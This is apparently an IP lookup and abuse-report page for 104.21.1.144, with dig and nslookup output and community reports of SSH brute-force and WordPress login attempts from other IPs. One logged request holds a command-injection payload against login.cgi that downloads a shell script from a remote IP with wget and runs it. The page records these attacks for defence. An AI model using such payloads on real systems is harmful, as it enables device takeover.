Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: United States

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
IP Type Details Datetime
104.21.18.76 normal
The hostname for this IP is minecraftworldmap.com
2022-07-23 06:23:40
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 104.21.1.144
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1302
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;104.21.1.144.			IN	A

;; AUTHORITY SECTION:
.			486	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022021700 1800 900 604800 86400

;; Query time: 61 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Feb 17 17:22:52 CST 2022
;; MSG SIZE  rcvd: 105
Host info
Host 144.1.21.104.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 144.1.21.104.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
186.4.224.171 attack
Jul  1 07:32:47 vtv3 sshd\[23811\]: Invalid user www from 186.4.224.171 port 38730
Jul  1 07:32:47 vtv3 sshd\[23811\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=186.4.224.171
Jul  1 07:32:49 vtv3 sshd\[23811\]: Failed password for invalid user www from 186.4.224.171 port 38730 ssh2
Jul  1 07:35:05 vtv3 sshd\[24748\]: Invalid user 8 from 186.4.224.171 port 33614
Jul  1 07:35:05 vtv3 sshd\[24748\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=186.4.224.171
Jul  1 07:46:42 vtv3 sshd\[30840\]: Invalid user ankit from 186.4.224.171 port 39702
Jul  1 07:46:42 vtv3 sshd\[30840\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=186.4.224.171
Jul  1 07:46:44 vtv3 sshd\[30840\]: Failed password for invalid user ankit from 186.4.224.171 port 39702 ssh2
Jul  1 07:48:28 vtv3 sshd\[31658\]: Invalid user testuser from 186.4.224.171 port 56704
Jul  1 07:48:28 vtv3 sshd\[31658\]: pam_unix\(
2019-07-07 07:47:47
217.29.21.66 attackspam
Jul  7 01:11:55 lnxweb61 sshd[30779]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.29.21.66
Jul  7 01:11:58 lnxweb61 sshd[30779]: Failed password for invalid user tss from 217.29.21.66 port 57542 ssh2
Jul  7 01:14:44 lnxweb61 sshd[32765]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.29.21.66
2019-07-07 07:50:37
139.168.56.89 attackbots
Jul  7 01:15:47 [host] sshd[22579]: Invalid user rose from 139.168.56.89
Jul  7 01:15:47 [host] sshd[22579]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.168.56.89
Jul  7 01:15:49 [host] sshd[22579]: Failed password for invalid user rose from 139.168.56.89 port 38162 ssh2
2019-07-07 07:20:08
103.107.84.66 attack
proto=tcp  .  spt=60742  .  dpt=25  .     (listed on Blocklist de  Jul 06)     (38)
2019-07-07 07:41:33
41.89.160.13 attack
Jul  7 06:11:18 itv-usvr-01 sshd[8511]: Invalid user user2 from 41.89.160.13
Jul  7 06:11:18 itv-usvr-01 sshd[8511]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=41.89.160.13
Jul  7 06:11:18 itv-usvr-01 sshd[8511]: Invalid user user2 from 41.89.160.13
Jul  7 06:11:21 itv-usvr-01 sshd[8511]: Failed password for invalid user user2 from 41.89.160.13 port 57872 ssh2
Jul  7 06:15:30 itv-usvr-01 sshd[8671]: Invalid user test from 41.89.160.13
2019-07-07 07:26:24
41.160.6.186 attackspambots
proto=tcp  .  spt=50137  .  dpt=25  .     (listed on Blocklist de  Jul 06)     (25)
2019-07-07 08:04:38
46.101.41.162 attackbotsspam
Jul  7 01:15:34 srv206 sshd[12651]: Invalid user c1 from 46.101.41.162
Jul  7 01:15:34 srv206 sshd[12651]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.41.162
Jul  7 01:15:34 srv206 sshd[12651]: Invalid user c1 from 46.101.41.162
Jul  7 01:15:36 srv206 sshd[12651]: Failed password for invalid user c1 from 46.101.41.162 port 49768 ssh2
...
2019-07-07 07:24:18
167.99.79.156 attackspam
167.99.79.156 - - [07/Jul/2019:01:15:11 +0200] "GET /wp-login.php HTTP/1.1" 200 4405 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
167.99.79.156 - - [07/Jul/2019:01:15:12 +0200] "POST /wp-login.php HTTP/1.1" 200 4405 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
167.99.79.156 - - [07/Jul/2019:01:15:14 +0200] "GET /wp-login.php HTTP/1.1" 200 4405 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
167.99.79.156 - - [07/Jul/2019:01:15:15 +0200] "POST /wp-login.php HTTP/1.1" 200 4405 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
167.99.79.156 - - [07/Jul/2019:01:15:29 +0200] "POST /wp-login.php HTTP/1.1" 200 4405 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
167.99.79.156 - - [07/Jul/2019:01:15:34 +0200] "GET /wp-login.php HTTP/1.1" 200 4405 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...
2019-07-07 07:24:49
129.150.122.243 attackspambots
Jul  7 01:12:46 cp sshd[7631]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.150.122.243
Jul  7 01:12:47 cp sshd[7631]: Failed password for invalid user apagar from 129.150.122.243 port 30122 ssh2
Jul  7 01:15:41 cp sshd[9285]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.150.122.243
2019-07-07 07:22:51
205.209.241.6 attackspambots
205.209.241.6 - - [07/Jul/2019:01:15:48 +0200] "GET /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
205.209.241.6 - - [07/Jul/2019:01:15:48 +0200] "POST /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
205.209.241.6 - - [07/Jul/2019:01:15:49 +0200] "GET /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
205.209.241.6 - - [07/Jul/2019:01:15:49 +0200] "POST /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
205.209.241.6 - - [07/Jul/2019:01:15:49 +0200] "GET /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
205.209.241.6 - - [07/Jul/2019:01:15:49 +0200] "POST /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...
2019-07-07 07:19:34
54.38.18.211 attackspam
Jul  6 21:56:04 mail sshd\[7515\]: Invalid user music from 54.38.18.211 port 58630
Jul  6 21:56:04 mail sshd\[7515\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=54.38.18.211
Jul  6 21:56:05 mail sshd\[7515\]: Failed password for invalid user music from 54.38.18.211 port 58630 ssh2
Jul  6 21:58:53 mail sshd\[7557\]: Invalid user pages from 54.38.18.211 port 36932
Jul  6 21:58:53 mail sshd\[7557\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=54.38.18.211
...
2019-07-07 07:16:25
201.249.59.205 attackspam
Jul  7 01:14:32 cvbmail sshd\[27200\]: Invalid user user from 201.249.59.205
Jul  7 01:14:32 cvbmail sshd\[27200\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=201.249.59.205
Jul  7 01:14:34 cvbmail sshd\[27200\]: Failed password for invalid user user from 201.249.59.205 port 49618 ssh2
2019-07-07 07:54:59
142.93.65.163 attackbotsspam
142.93.65.163 - - [07/Jul/2019:01:15:04 +0200] "GET /wp-login.php HTTP/1.1" 200 4404 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.93.65.163 - - [07/Jul/2019:01:15:04 +0200] "POST /wp-login.php HTTP/1.1" 200 4404 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.93.65.163 - - [07/Jul/2019:01:15:05 +0200] "GET /wp-login.php HTTP/1.1" 200 4404 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.93.65.163 - - [07/Jul/2019:01:15:05 +0200] "POST /wp-login.php HTTP/1.1" 200 4404 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.93.65.163 - - [07/Jul/2019:01:15:05 +0200] "GET /wp-login.php HTTP/1.1" 200 4404 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.93.65.163 - - [07/Jul/2019:01:15:05 +0200] "POST /wp-login.php HTTP/1.1" 200 4404 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...
2019-07-07 07:37:13
36.82.197.88 attackbotsspam
36.82.197.88 - - [07/Jul/2019:01:14:33 +0200] "GET /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
36.82.197.88 - - [07/Jul/2019:01:14:34 +0200] "POST /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
36.82.197.88 - - [07/Jul/2019:01:14:35 +0200] "GET /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
36.82.197.88 - - [07/Jul/2019:01:14:36 +0200] "POST /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
36.82.197.88 - - [07/Jul/2019:01:14:37 +0200] "GET /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
36.82.197.88 - - [07/Jul/2019:01:14:38 +0200] "POST /wp-login.php HTTP/1.1" 200 4403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...
2019-07-07 07:54:12
89.175.143.187 attackspam
89.175.143.187 - - [06/Jul/2019:15:12:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.93.159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0"
...
2019-07-07 07:17:42

Recently Reported IPs

104.21.1.143 104.21.1.148 104.21.1.15 104.21.1.154
104.21.1.155 104.21.1.160 104.21.1.164 104.21.1.166
104.21.1.167 104.21.1.168 104.21.1.169 104.21.1.174
104.21.1.177 59.120.59.98 104.21.1.179 104.21.1.180
87.14.46.186 104.21.1.181 104.21.1.182 104.21.1.185